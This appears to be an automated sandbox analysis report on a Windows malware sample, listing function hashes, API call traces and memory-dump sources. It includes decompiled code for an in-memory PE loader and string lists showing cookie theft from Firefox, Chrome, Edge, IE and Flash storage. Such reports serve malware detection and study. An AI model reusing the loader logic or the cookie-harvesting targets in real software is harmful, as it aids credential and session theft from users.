Opcode Fuzzy Hash: 064b318b35b5f923f187939a8e95832bf64cc5d41409cda42c04da043465b7ac
Instruction Fuzzy Hash: 5BE0483575522367EFA17A79ED0676F6B91EF41744F0049B4F54DD1091C710D412C691

Uniqueness

Uniqueness Score: -1.00%

Function 02B74926, Relevance: 2.6, APIs: 2, Instructions: 70memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02B89D35: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 02B89D6E
Part of subcall function 02B89D35: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 02B89DA4
Part of subcall function 02B89D35: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02B89DB0
Part of subcall function 02B89D35: lstrcmpi.KERNEL32(?,00000000), ref: 02B89DED
Part of subcall function 02B89D35: StrChrA.SHLWAPI(?,0000002E), ref: 02B89DF6
Part of subcall function 02B89D35: lstrcmpi.KERNEL32(?,00000000), ref: 02B89E08
Part of subcall function 02B89D35: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02B89E59

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,02B9A5A8,0000002C,02B89AAA,NTDLL.DLL,6547775A,?,02B71224), ref: 02B74965

Part of subcall function 02B8AC94: GetProcAddress.KERNEL32(6F57775A,00000000), ref: 02B8ACBD
Part of subcall function 02B8AC94: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,02B86D3E,00000000,00000000,00000028,00000100), ref: 02B8ACDF

VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,02B9A5A8,0000002C,02B89AAA,NTDLL.DLL,6547775A,?,02B71224), ref: 02B749F0

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
String ID:
API String ID: 4138075514-0
Opcode ID: bca3b4ce2d3afbf24186060fb279c85415c9955502b8b1d75a47d9bb68fd6168
Instruction ID: 7d60e15481160f038ad325b58e2e03f4b8c59f9f7fc81892de946ae01c225252
Opcode Fuzzy Hash: bca3b4ce2d3afbf24186060fb279c85415c9955502b8b1d75a47d9bb68fd6168
Instruction Fuzzy Hash: E721F575D01229AFCF11DFA5DC80ADEBBB5FF08760F10816AEA24B6250C3344A41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004015F2, Relevance: 2.5, APIs: 2, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E004015F2(void* __ecx) {
				void* _v8;
				char _v12;
				signed short _t15;
				char* _t18;
				char* _t25;
				char* _t29;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t25 = 0;
				if(E00401F65( &_v8,  &_v12,  *0x40414c ^ 0x196db149) != 0) {
					if(_v8 == 0) {
						_t29 = 0;
					} else {
						_t29 = E00401D76(_t22, _v8,  *0x40414c ^ 0x6e49bbff);
					}
					if(_t29 != 0) {
						_t15 = E00401B13(_t22); // executed
						_v12 = _t15 & 0x0000ffff;
						_t18 = StrStrIA(_t29,  &_v12); // executed
						if(_t18 != 0) {
							_t25 = 0x657;
						}
					}
					HeapFree( *0x404110, 0, _v8);
				}
				return _t25;
			}

0x004015f2
0x004015f5
0x004015f6
0x0040160c
0x00401615
0x0040161a
0x00401633
0x0040161c
0x0040162f
0x0040162f
0x00401637
0x00401639
0x00401641
0x00401649
0x00401651
0x00401653
0x00401653
0x00401651
0x00401663
0x00401663
0x0040166e

APIs

StrStrIA.KERNELBASE(00000000,?,?,?,?,00000000,00000000,?,?,?,00401069), ref: 00401649
HeapFree.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,?,?,00401069), ref: 00401663

Memory Dump Source

Source File: 00000001.00000002.448591330.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.448578715.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.448616383.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.448636811.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.448653832.0000000000406000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 4fb307658d76e96f2830ed72fb923900accf5510f7a6fef0c5164a374397e91f
Instruction ID: 14ec10e42b3a95bc364408b54f930263e7de161da432ac124d7dc0820da3e600
Opcode Fuzzy Hash: 4fb307658d76e96f2830ed72fb923900accf5510f7a6fef0c5164a374397e91f
Instruction Fuzzy Hash: 0601A776901114BBCB109FA6DD04E9F7BBCAB88740F150577F901F72A4E635DE0197A8

Uniqueness

Uniqueness Score: -1.00%

Function 02B7614C, Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(41564441,00000000,?,00000000,02B7B275,?,?,00000000,?,?,00000001,00000000,?,00000001,02B983E4,00000002), ref: 02B76161

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b608be54e062aeea669727b6999c5b96de257298b1b9e24723dee6e5110ec9bf
Instruction ID: 780472be578fa8af1ac80ef48f665d2ee039c8c31435e8cc4f3f580ad5610e31
Opcode Fuzzy Hash: b608be54e062aeea669727b6999c5b96de257298b1b9e24723dee6e5110ec9bf
Instruction Fuzzy Hash: 1E21A1B2E00508EFCB10FF99D985AADBBBDFB04314F1548EAD668A7201D731A981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02B83B01, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000000,02B9D514,00000000,?,?,02B7619F,00000004,00000000,?,00000000,02B7B275,?,?), ref: 02B83B3C

Part of subcall function 02B8CD7A: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,02B9E240), ref: 02B8CD91

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: HandleInformationModuleProcessQuery
String ID:
API String ID: 2776635927-0
Opcode ID: 77564a7b6eddf89c3e3f80bfc8583119f9f471b6d527f283fa68ef7e39babbcd
Instruction ID: ae73da1c634faf088b5811905a4dc094c2586d53f89c1a77885d0f9c9646356c
Opcode Fuzzy Hash: 77564a7b6eddf89c3e3f80bfc8583119f9f471b6d527f283fa68ef7e39babbcd
Instruction Fuzzy Hash: AD21CDB1600604AFCB20FF59C8C4E6977E9EF40B9472844E9F94DCB250EB30E940CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02B92B84, Relevance: 1.6, APIs: 1, Instructions: 52processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02B92BD6

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 867d49a1d545aab57f97f52b9a342974a7aafd889e0cc6526b9aafaf12a601fa
Instruction ID: 58a6f7bb90dae7159c955411f29971b4a8e348c501348c16315c13c58a8027d8
Opcode Fuzzy Hash: 867d49a1d545aab57f97f52b9a342974a7aafd889e0cc6526b9aafaf12a601fa
Instruction Fuzzy Hash: 80111B3260020ABFDF019FA9DD409DA7FAAEF18374B058179FE2892120C731D921DF90

Uniqueness

Uniqueness Score: -1.00%

Function 02B7D9EB, Relevance: 1.5, APIs: 1, Instructions: 15threadCOMMON

Download Yara Rule

APIs

Part of subcall function 02B81F00: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,02B9E088,00000000,02B7D9F2,?,02B79809,?), ref: 02B81F1F
Part of subcall function 02B81F00: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,02B9E088,00000000,02B7D9F2,?,02B79809,?), ref: 02B81F2A
Part of subcall function 02B81F00: _wcsupr.NTDLL ref: 02B81F37
Part of subcall function 02B81F00: lstrlenW.KERNEL32(00000000), ref: 02B81F3F

ResumeThread.KERNEL32(00000004,?,02B79809,?), ref: 02B7DA00

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
String ID:
API String ID: 3646851950-0
Opcode ID: 428bb613dc9e60ba97152df47c252c1d12b6887ba75911bd1198c30b2d976b0e
Instruction ID: ebeaa7b3b95cbbe13710481f4836f32f5f9e87a6e3d69e923c4cbcb432c734cf
Opcode Fuzzy Hash: 428bb613dc9e60ba97152df47c252c1d12b6887ba75911bd1198c30b2d976b0e
Instruction Fuzzy Hash: F6D0A730208302EBEB217B20CE05B0ABEE2FF10BC1F008898FBEE51074D3328421DA08

Uniqueness

Uniqueness Score: -1.00%

Function 02B965AA, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 02B9659C

Part of subcall function 02B966AC: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,0002A594,02B70000), ref: 02B96725

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 23de104cdfa67da37df126228f7cccec349e18a2651b536c0633f2fb00c35fad
Instruction ID: 92c4b1a9e6d5b9eeedff2dc7a0009da4fb6f4b2aba1610caba8445bce25c161f
Opcode Fuzzy Hash: 23de104cdfa67da37df126228f7cccec349e18a2651b536c0633f2fb00c35fad
Instruction Fuzzy Hash: B4A011F22A8002BC3C082A202C02C3B232CC2C8A2232088BAF002C00A2A8802C008030

Uniqueness

Uniqueness Score: -1.00%

Function 02B9658F, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 02B9659C

Part of subcall function 02B966AC: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,0002A594,02B70000), ref: 02B96725

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 36b7e549a59682e4f4075c57870ed0fe952901e4e5592919b3e339d8cf727b03
Instruction ID: 50a7c1c603c91ce1bbd1e28cc5e60004b764c4179fb99241dc336df433ea42b8
Opcode Fuzzy Hash: 36b7e549a59682e4f4075c57870ed0fe952901e4e5592919b3e339d8cf727b03
Instruction Fuzzy Hash: 33A022F23A82023C3C082B202C02C3B233CC3C0F2233080FEF002C00A3E8882C008030

Uniqueness

Uniqueness Score: -1.00%

Function 02B9247D, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000200,02B86D11), ref: 02B92489

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 549960ae9055f7f2e2952dadc5b47cf63b147cd2f687157b3b615f1821b8a495
Instruction ID: 07d96ec3b6120113e2f6bb92a43c19624936a0c706d5d9de01237138197f5b57
Opcode Fuzzy Hash: 549960ae9055f7f2e2952dadc5b47cf63b147cd2f687157b3b615f1821b8a495
Instruction Fuzzy Hash: DFB01231880100ABCE015B20EF05F057B31B750740F104910F204820B082310431EB04

Uniqueness

Uniqueness Score: -1.00%

Function 00401252, Relevance: 1.3, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00401252(void* __eax, void* __edx) {
				char _v8;
				void* _v12;
				void* _t17;
				long _t23;
				long _t25;
				long _t28;
				void* _t31;
				intOrPtr* _t34;
				void* _t35;
				intOrPtr* _t36;
				intOrPtr _t38;

				_t31 = __edx;
				_t35 = __eax;
				_t17 = E00401314( &_v8,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) + 0x00000fff & 0xfffff000,  &_v8,  &_v12); // executed
				if(_t17 != 0) {
					_t28 = 8;
					goto L8;
				} else {
					_t34 = _v8;
					_t28 = E004016DB( &_v8, _t34, _t35);
					if(_t28 == 0) {
						_t38 =  *((intOrPtr*)(_t34 + 0x3c)) + _t34;
						_t23 = E00401792(_t34, _t38); // executed
						_t28 = _t23;
						if(_t28 == 0) {
							_t25 = E00401CCA(_t38, _t31, _t34); // executed
							_t28 = _t25;
							if(_t28 == 0) {
								_push(_t25);
								_push(1);
								_push(_t34);
								if( *((intOrPtr*)( *((intOrPtr*)(_t38 + 0x28)) + _t34))() == 0) {
									_t28 = GetLastError();
								}
							}
						}
					}
					_t36 = _v12;
					 *((intOrPtr*)(_t36 + 0x18))( *((intOrPtr*)(_t36 + 0x1c))( *_t36));
					E004019CF(_t36);
					L8:
					return _t28;
				}
			}

0x00401252
0x0040125a
0x00401277
0x0040127e
0x004012dd
0x00000000
0x00401280
0x00401280
0x0040128a
0x0040128e
0x00401293
0x00401297
0x0040129c
0x004012a0
0x004012a5
0x004012aa
0x004012ae
0x004012b3
0x004012b4
0x004012b8
0x004012bd
0x004012c5
0x004012c5
0x004012bd
0x004012ae
0x004012a0
0x004012c7
0x004012d0
0x004012d4
0x004012de
0x004012e4
0x004012e4

APIs

Part of subcall function 00401314: GetModuleHandleA.KERNEL32(?,00000020,00000002,0000000A,?,?,?,?,0040127C,?,?,?,00000002,?,?,?), ref: 00401339
Part of subcall function 00401314: GetProcAddress.KERNEL32(00000000,?), ref: 0040135B
Part of subcall function 00401314: GetProcAddress.KERNEL32(00000000,?), ref: 00401371
Part of subcall function 00401314: GetProcAddress.KERNEL32(00000000,?), ref: 00401387
Part of subcall function 00401314: GetProcAddress.KERNEL32(00000000,?), ref: 0040139D
Part of subcall function 00401314: GetProcAddress.KERNEL32(00000000,?), ref: 004013B3

Part of subcall function 004016DB: memcpy.NTDLL(?,00000002,0040128A,?,0000000A,?,?,?,0040128A,?,0000000A,?,?,?,00000002), ref: 00401708
Part of subcall function 004016DB: memcpy.NTDLL(?,00000002,?,00000002,?,?,?,?), ref: 0040173B

Part of subcall function 00401792: LoadLibraryA.KERNELBASE(00000002,00000002,?,00000000,?,?,00000002), ref: 004017C8
Part of subcall function 00401792: lstrlenA.KERNEL32(00000002), ref: 004017DE
Part of subcall function 00401792: memset.NTDLL ref: 004017E8
Part of subcall function 00401792: GetProcAddress.KERNEL32(?,00000002), ref: 0040184B
Part of subcall function 00401792: lstrlenA.KERNEL32(-00000002), ref: 00401860
Part of subcall function 00401792: memset.NTDLL ref: 0040186A

Part of subcall function 00401CCA: VirtualProtect.KERNELBASE(00000000,?,00000004,00000002,?,00000002,00000000,?,00000002), ref: 00401CF8
Part of subcall function 00401CCA: VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 00401D4F
Part of subcall function 00401CCA: GetLastError.KERNEL32(?,?), ref: 00401D55

GetLastError.KERNEL32(?,?,?,?), ref: 004012BF

Memory Dump Source

Source File: 00000001.00000002.448591330.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.448578715.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.448616383.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.448636811.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.448653832.0000000000406000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtuallstrlenmemcpymemset$HandleLibraryLoadModule
String ID:
API String ID: 33504255-0
Opcode ID: dfa1b25f661902dd3fc868d40e6ffb261b9980a2196f9bd25492ffe3d1eff05a
Instruction ID: 8be9401ae0c3255fc8beac30657a721242387534828f83b2d586fbb927c2c8d5
Opcode Fuzzy Hash: dfa1b25f661902dd3fc868d40e6ffb261b9980a2196f9bd25492ffe3d1eff05a
Instruction Fuzzy Hash: 321140766006056BD72067E68C85DAB77FCAF45318B00017EFA01F7391EB78EC058764

Uniqueness

Uniqueness Score: -1.00%

Function 02B84F76, Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 02B84F80

Part of subcall function 02B8E866: RegOpenKeyExA.KERNELBASE(02B84F98,00000000,00000000,00020119,80000001,00000000,Software\AppDataLow\Software\Microsoft\,00000000,?,02B9E130,02B84F98,02B815E7,80000001,?,02B815E7), ref: 02B8E89F
Part of subcall function 02B8E866: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,?,02B815E7), ref: 02B8E8B3
Part of subcall function 02B8E866: RegCloseKey.KERNELBASE(?,?,Client32,?,?,?,02B815E7), ref: 02B8E8FC

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Open$Closememset
String ID:
API String ID: 1685373161-0
Opcode ID: e0687e6f58cfad2a21941a97c3c994ebabc033b97c44297dbb8b3ae019ffb63b
Instruction ID: 1408ada6d996c005cedd9c576cbd68f36c9cf21f49f3c363f487af25b2bd8843
Opcode Fuzzy Hash: e0687e6f58cfad2a21941a97c3c994ebabc033b97c44297dbb8b3ae019ffb63b
Instruction Fuzzy Hash: 2AE0E230140108BADB20BF55CC01F893B66AF10790F408060BE1C69161D772EAA4EB84

Uniqueness

Uniqueness Score: -1.00%

Function 02B749D6, Relevance: 1.3, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,02B9A5A8,0000002C,02B89AAA,NTDLL.DLL,6547775A,?,02B71224), ref: 02B749F0

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 79078194e5f1684cf939b83a3fd107778ac955dbd357565b7217a04fff92ee7a
Instruction ID: f27671f3a6140604c53a6a748bf78bf6029f96264d12197fd39821a796471272
Opcode Fuzzy Hash: 79078194e5f1684cf939b83a3fd107778ac955dbd357565b7217a04fff92ee7a
Instruction Fuzzy Hash: 1BD01731D00229DBCB20DF94D845A9EFBB1BF09750F608264EA60731A4C7301922CF90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02B75ECA, Relevance: 58.0, APIs: 16, Strings: 17, Instructions: 226memorystringfileCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(%APPDATA%,02B96CE0,00000000,?,00000000,02B723FE), ref: 02B75EE2

Part of subcall function 02B8888D: lstrlenW.KERNEL32(?,00000000,%APPDATA%\Mozilla\Firefox\Profiles,?,00000250,?,00000000), ref: 02B888D9
Part of subcall function 02B8888D: lstrlenW.KERNEL32(?,?,00000000), ref: 02B888E5
Part of subcall function 02B8888D: memset.NTDLL ref: 02B8892D
Part of subcall function 02B8888D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 02B88948
Part of subcall function 02B8888D: lstrlenW.KERNEL32(0000002C), ref: 02B88980
Part of subcall function 02B8888D: lstrlenW.KERNEL32(?), ref: 02B88988
Part of subcall function 02B8888D: memset.NTDLL ref: 02B889AB
Part of subcall function 02B8888D: wcscpy.NTDLL ref: 02B889BD

Part of subcall function 02B8888D: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 02B889E3
Part of subcall function 02B8888D: RtlEnterCriticalSection.NTDLL(?), ref: 02B88A18
Part of subcall function 02B8888D: RtlLeaveCriticalSection.NTDLL(?), ref: 02B88A34
Part of subcall function 02B8888D: FindNextFileW.KERNEL32(?,00000000), ref: 02B88A4D
Part of subcall function 02B8888D: WaitForSingleObject.KERNEL32(00000000), ref: 02B88A5F
Part of subcall function 02B8888D: FindClose.KERNEL32(?), ref: 02B88A74
Part of subcall function 02B8888D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 02B88A88
Part of subcall function 02B8888D: lstrlenW.KERNEL32(0000002C), ref: 02B88AAA

RtlAllocateHeap.NTDLL(00000000,00000036,%APPDATA%\Mozilla\Firefox\Profiles), ref: 02B75F29
memcpy.NTDLL(00000000,%APPDATA%,00000000,?,00000000,02B723FE), ref: 02B75F3E
lstrcpyW.KERNEL32(00000000,\Macromedia\Flash Player\), ref: 02B75F4E

Part of subcall function 02B8888D: FindNextFileW.KERNEL32(?,00000000), ref: 02B88B20
Part of subcall function 02B8888D: WaitForSingleObject.KERNEL32(00000000), ref: 02B88B32
Part of subcall function 02B8888D: FindClose.KERNEL32(?), ref: 02B88B4D

HeapFree.KERNEL32(00000000,00000000,00000000,*.sol,?,00000000,00000000,00000010,?,?,00000000,02B723FE), ref: 02B75F72
RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 02B75F8A
HeapFree.KERNEL32(00000000,00000000,?,00000000,02B723FE), ref: 02B75FD6
lstrlenW.KERNEL32(00000000,%userprofile%\AppData\Local\,?,00000000,02B723FE), ref: 02B75FF5
RtlAllocateHeap.NTDLL(00000000,?), ref: 02B76007
HeapFree.KERNEL32(00000000,00000000,00000000,cookies,?,00000000,00000000,00000014,?,00000000,02B723FE), ref: 02B7605E
HeapFree.KERNEL32(00000000,00000000,?,00000000,02B723FE), ref: 02B76070
CreateDirectoryW.KERNEL32(00000000,00000000,%userprofile%\AppData\Local\,?,00000000,02B723FE), ref: 02B76097
lstrlenW.KERNEL32(\cookie.ie,%userprofile%\AppData\Local\,?,00000000,02B723FE), ref: 02B760DD
DeleteFileW.KERNEL32(?,%userprofile%\AppData\Local\,?,00000000,02B723FE), ref: 02B76106
HeapFree.KERNEL32(00000000,?,?,00000000,02B723FE), ref: 02B76114
HeapFree.KERNEL32(00000000,?,?,00000000,02B723FE), ref: 02B76137

Strings

\cookie.ff, xrefs: 02B760D0, 02B760DC
\cookie.cr, xrefs: 02B760C9
\cookie.ie, xrefs: 02B760D7
\Macromedia\Flash Player\, xrefs: 02B75F46
*.cookie, xrefs: 02B75FC1
\sols, xrefs: 02B760E5
*.txt, xrefs: 02B75FAB
%userprofile%\AppData\Local\, xrefs: 02B75FDC
\cookie.ed, xrefs: 02B760C2
%APPDATA%, xrefs: 02B75ED5, 02B75F38
cookies.sqlite, xrefs: 02B75EF5
Microsoft\Edge\User Data\Default, xrefs: 02B76032
*.sol, xrefs: 02B75F5D
Google\Chrome\User Data\Default, xrefs: 02B7600F
cookies, xrefs: 02B76027, 02B76049
cookies.sqlite-journal, xrefs: 02B75F10
%APPDATA%\Mozilla\Firefox\Profiles, xrefs: 02B75EFA, 02B75EFF, 02B75F15

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heap$lstrlen$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymemcpywcscpy
String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$%userprofile%\AppData\Local\$*.cookie$*.sol$*.txt$Google\Chrome\User Data\Default$Microsoft\Edge\User Data\Default$\Macromedia\Flash Player\$\cookie.cr$\cookie.ed$\cookie.ff$\cookie.ie$\sols$cookies$cookies.sqlite$cookies.sqlite-journal
API String ID: 659829602-1887243743
Opcode ID: 864e92ef1f86d139c0b7c3c06cab4629e9a27eeacecd39de49e981d669af68e3
Instruction ID: dd466288543cb089998bd9d6905bf0783d1ec4e0b8d32f82a0dfb47cf6ba56fd
Opcode Fuzzy Hash: 864e92ef1f86d139c0b7c3c06cab4629e9a27eeacecd39de49e981d669af68e3
Instruction Fuzzy Hash: B7610671980705BFDB20BF659D88E7B7BFCEB8AB44B0009A9F606D3551E7609920CB71

Uniqueness

Uniqueness Score: -1.00%

Function 02B7E0BA, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 224memoryfiletimeCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,63699BC3,.dll), ref: 02B7E0E8
RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 02B7E10B
memset.NTDLL ref: 02B7E126

Part of subcall function 02B83996: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,02B7E13F,73797325), ref: 02B839A7
Part of subcall function 02B83996: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 02B839C1

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 02B7E167
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 02B7E17D
CloseHandle.KERNEL32(?), ref: 02B7E197
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 02B7E1A4
lstrcat.KERNEL32(?,642E2A5C), ref: 02B7E1E9
FindFirstFileA.KERNEL32(?,?), ref: 02B7E1FE
CompareFileTime.KERNEL32(?,?), ref: 02B7E21C
FindNextFileA.KERNEL32(?,?), ref: 02B7E22F
FindClose.KERNEL32(?), ref: 02B7E23D
FindFirstFileA.KERNEL32(?,?), ref: 02B7E248
CompareFileTime.KERNEL32(?,?), ref: 02B7E268
StrChrA.SHLWAPI(?,0000002E), ref: 02B7E2A0
memcpy.NTDLL(?,?,00000000), ref: 02B7E2D6
FindNextFileA.KERNEL32(?,?), ref: 02B7E2EB
FindClose.KERNEL32(?), ref: 02B7E2F9
FindFirstFileA.KERNEL32(?,?), ref: 02B7E304
CompareFileTime.KERNEL32(?,?), ref: 02B7E314
FindClose.KERNEL32(?), ref: 02B7E34D
HeapFree.KERNEL32(00000000,?,73797325), ref: 02B7E360
HeapFree.KERNEL32(00000000,?), ref: 02B7E371

Strings

.dll, xrefs: 02B7E0D3

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$CreateHandlelstrcatmemcpymemset
String ID: .dll
API String ID: 455834338-2738580789
Opcode ID: 662edc419746dc977ca3d9d487fa71d302fae949482d1bc44f256fa8a68b064c
Instruction ID: 2c677d3f6611ccbc5baecd5db5f44a374e4cd7cb3664e38bf62b6dcd62e541ff
Opcode Fuzzy Hash: 662edc419746dc977ca3d9d487fa71d302fae949482d1bc44f256fa8a68b064c
Instruction Fuzzy Hash: A6813472908301AFD711DF25D984A6BBBE9FF98384F000AAEF595D3190E770D918CB62

Uniqueness

Uniqueness Score: -1.00%

Function 02B8888D, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 233stringfilesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 02B9247D: RtlAllocateHeap.NTDLL(00000000,00000200,02B86D11), ref: 02B92489

Part of subcall function 02B79689: ExpandEnvironmentStringsW.KERNEL32(02B91384,00000000,00000000,00000001,00000000,00000000,?,02B91384,00000000), ref: 02B796A0
Part of subcall function 02B79689: ExpandEnvironmentStringsW.KERNEL32(02B91384,00000000,00000000,00000000), ref: 02B796BA

lstrlenW.KERNEL32(?,00000000,%APPDATA%\Mozilla\Firefox\Profiles,?,00000250,?,00000000), ref: 02B888D9
lstrlenW.KERNEL32(?,?,00000000), ref: 02B888E5
memset.NTDLL ref: 02B8892D
FindFirstFileW.KERNEL32(00000000,00000000), ref: 02B88948
lstrlenW.KERNEL32(0000002C), ref: 02B88980
lstrlenW.KERNEL32(?), ref: 02B88988
memset.NTDLL ref: 02B889AB
wcscpy.NTDLL ref: 02B889BD
PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 02B889E3
RtlEnterCriticalSection.NTDLL(?), ref: 02B88A18

Part of subcall function 02B84FB0: HeapFree.KERNEL32(00000000,00000200,02B86EB2,00000000,00000100,00000200), ref: 02B84FBC

RtlLeaveCriticalSection.NTDLL(?), ref: 02B88A34
FindNextFileW.KERNEL32(?,00000000), ref: 02B88A4D
WaitForSingleObject.KERNEL32(00000000), ref: 02B88A5F
FindClose.KERNEL32(?), ref: 02B88A74
FindFirstFileW.KERNEL32(00000000,00000000), ref: 02B88A88
lstrlenW.KERNEL32(0000002C), ref: 02B88AAA
FindNextFileW.KERNEL32(?,00000000), ref: 02B88B20
WaitForSingleObject.KERNEL32(00000000), ref: 02B88B32
FindClose.KERNEL32(?), ref: 02B88B4D

Strings

%APPDATA%\Mozilla\Firefox\Profiles, xrefs: 02B888CD

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
String ID: %APPDATA%\Mozilla\Firefox\Profiles
API String ID: 2962561936-3215297822
Opcode ID: f9a8fb60b55d051d7c9eb298b21289fdabc28d51b249850c0d1e0114222015ac
Instruction ID: b7dd87ae50ab2910b0b698aaabe29efd6b9b4c68f04099ea9082989d7822dbf3
Opcode Fuzzy Hash: f9a8fb60b55d051d7c9eb298b21289fdabc28d51b249850c0d1e0114222015ac
